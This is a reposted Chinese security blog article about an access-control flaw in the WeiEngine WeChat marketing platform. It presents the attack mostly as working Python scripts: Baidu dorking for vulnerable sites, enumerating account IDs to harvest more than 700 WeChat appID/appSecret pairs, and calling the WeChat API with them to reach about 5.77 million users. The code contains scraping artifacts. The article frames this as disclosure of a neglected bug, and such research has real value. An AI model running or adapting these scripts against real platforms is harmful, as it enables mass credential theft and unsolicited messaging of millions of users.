转载

是谁让你我如此近距离(论第三方微信营销平台的安全隐患)

0x00 简介

开发微信第三方营销平台的人可谓是靠着微信官方开发文档发家的人,他们把开发文档变成产品,变成普通人一看就明白的东西,好多搞营销的不懂技术,好多做技术的不懂营销,他们可谓在技术和营销之前有效的搭了一座桥,让不懂技术的营销者可以通过第三方平台方便的接入微信。

微信本身是安全的,但是第三方平台的安全却没的保证,这篇文章就是想说明,在使用第三方平台便利性的同时埋下的安全隐患

0x01 从一个被忽略的漏洞说起

wooyun漏洞编号:wooyun-2016-0184202

WooYun: 微擎最新版可越权操作别人公众号 " title="微擎最新版可越权操作别人公众号"> WooYun: 微擎最新版可越权操作别人公众号

很不解如此影响深远的漏洞,为什么会被忽略,是对客户的不负责任,还是对漏洞本身的不了解

接下来就从这个被忽略的漏洞,挖出其背后成千上万受影响的用户

0x02 挖掘过程

  1. 百度搜索使用微擎系统的链接
  2. 注册并登录受影响的系统
  3. 批量获取受影响的系统中的微信appID和appSecret
  4. 通过调用微信开发者接口获取相应appID的用户列表
  5. 向这些用户发送hello world

百度搜索使用微擎系统的链接

#!python #!/usr/bin/env python #coding:utf-8 import requests import re from lxml import etree import sys reload(sys) sys.setdefaultencoding('utf-8') def getSearch(url):     headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "}     content = getContent(url, headers)     selector = etree.HTML(content)     selectUrl = selector.xpath('//div[@class="f13"]/a[1][email protected]

') urls.extend(selectUrl) def getSearchUrl(urls): for url in urls: headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} header = "Location" content = getRespHeader(url, headers, header) selectUrl.append(content) def getContent(url, headers): resp = requests.get(url, headers=headers) return resp.text def getRespHeader(url, headers, header): resp = requests.get(url, headers=headers, allow_redirects=False) return resp.headers.get(header) if __name__ == '__main__': urls = [] selectUrl = [] for i in [0, 10, 20, 30, 40, 50, 60]: url = "http://www.baidu.com/s?wd=inurl%%3Aweb%%2Findex.php%%3Fc%%3Duser%%26a%%3Dlogin%%26&pn=%d&ie=utf-8" %i getSearch(url) getSearchUrl(urls) print selectUrl

结果搜到63条链接:

是谁让你我如此近距离(论第三方微信营销平台的安全隐患)

注册并登录受影响的系统

本来打算写个脚本批量注册然后出appid和key的,但由于有验证码,又因为本地验证码程序没有跑起来,而且也就60多个网站,于是乎就手工了一下,然后把拿appid和appSecret的过程写了个脚本

批量获取受影响的系统中的微信appID和appSecret

#!python #!/usr/bin/env python #coding:utf-8 import requests from lxml import etree import sys reload(sys) sys.setdefaultencoding('utf-8') header = {"cookie":"7ba5___session=eyJ1aWQiOiIxMTE1IiwibGFzdHZpc2l0IjoiMTQ1ODQ3NTc1MyIsImxhc3RpcCI6IjIxOC4xMDguMTI4LjEwMSIsImhhc2giOiI4YzcyMjFjOTE4Y2U2NjY1ZTdiMTQxYWJlYmRlZTcxOSJ9","User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "} def getcontent(url,header):     resp = requests.get(url, headers=header)     return resp.text def getkey(html):     global count     rest = []     selector = etree.HTML(html)     weixinAppId = selector.xpath('//input[@name="key"][email protected]
') weixinAppSecret = selector.xpath('//input[@name="secret"][email protected]') weixinAppName = selector.xpath('//input[@name="subname"] [email protected]

') if weixinAppId[0] != '' and weixinAppSecret[0] != '' and weixinAppId[0].find('wx') == 0: print weixinAppName[0] rest.append(weixinAppName[0]) rest.append(weixinAppId[0]) rest.append(weixinAppSecret[0]) str_rest = str(rest).replace('u/'','/'') str_rest = str_rest.decode("unicode-escape") with open('result.txt', 'a') as fs: fs.write(str_rest + '/n') if __name__ == '__main__': for i in range(1, 1056): url = "http://wx.xxx.cn/web/index.php?c=account&a=post&uniacid=84&acid=%d" %i print url html = getcontent(url, header) getkey(html)

待每个链接都尝试之后,一共捕获到700多个微信appid和secret

是谁让你我如此近距离(论第三方微信营销平台的安全隐患)

通过调用微信开发者接口获取相应appID的用户列表

这里通过脚本获取一下这么多微信appid一共涉及多少用户

#!python # coding:utf-8 import requests import ast count = 0  def getCount(url):     global count     headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "}     resp = requests.get(url, headers=headers)     con = ast.literal_eval(resp.text)     if type(con) == dict and "total" in con:         count += int(con["total"])  def getAccesstoken(content):     con = ast.literal_eval(content)     if type(con) == dict and "access_token" in con:         url = "https://api.weixin.qq.com/cgi-bin/user/get?access_token=%s" % con["access_token"]         getCount(url)  def getContent(line):     headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "}     wxappid = line[1]     wxsecret = line[2]     url = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" % (wxappid, wxsecret)     resp = requests.get(url, headers=headers)     getAccesstoken(resp.text)  if __name__ == '__main__':     with open('result.txt', 'r') as fs:         for line in fs.readlines():             line = line.replace('/r', '').replace('/n', '')             getContent(eval(line))     print count

跑完脚本发现一共涉及到577万用户

是谁让你我如此近距离(论第三方微信营销平台的安全隐患)

0x03 结尾

这570多万用户重复率很低,可以向这570万用户推送广告,可以向这570万用户发送消息,可以向这500万用户发送一句"你我如此近距离,你却不知道我是谁"。

原文  http://drops.wooyun.org/tips/14016
正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 springcloud-demo XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 Spring Cloud Consul实现选举机制
  2. 2 Spring Boot集成ShedLock实现分布式定时任务
  3. 3 利用oss进行数据库和网站图片备份
  4. 4 Spring Cloud Stream实现数据流处理
  5. 5 Python3访问MySQL数据库快速入门Demo
  6. 6 Github开源项目作者可以免费申请 JetBrains 全家桶
  7. 7 Spring Cloud Vault快速入门Demo
  8. 8 Spring Cloud Gateway快速入门Demo
  9. 9 Spring Cloud Contract快速入门Demo
  10. 10 Spring Cloud Consul快速入门Demo
网站信息
  • 文章总数:82,714 篇
  • 文件总数:284,287 个
  • 标签总数:2,393 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:669 人
  • 运行天数:4,409天
  • 最后更新:2024年11月22日05点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG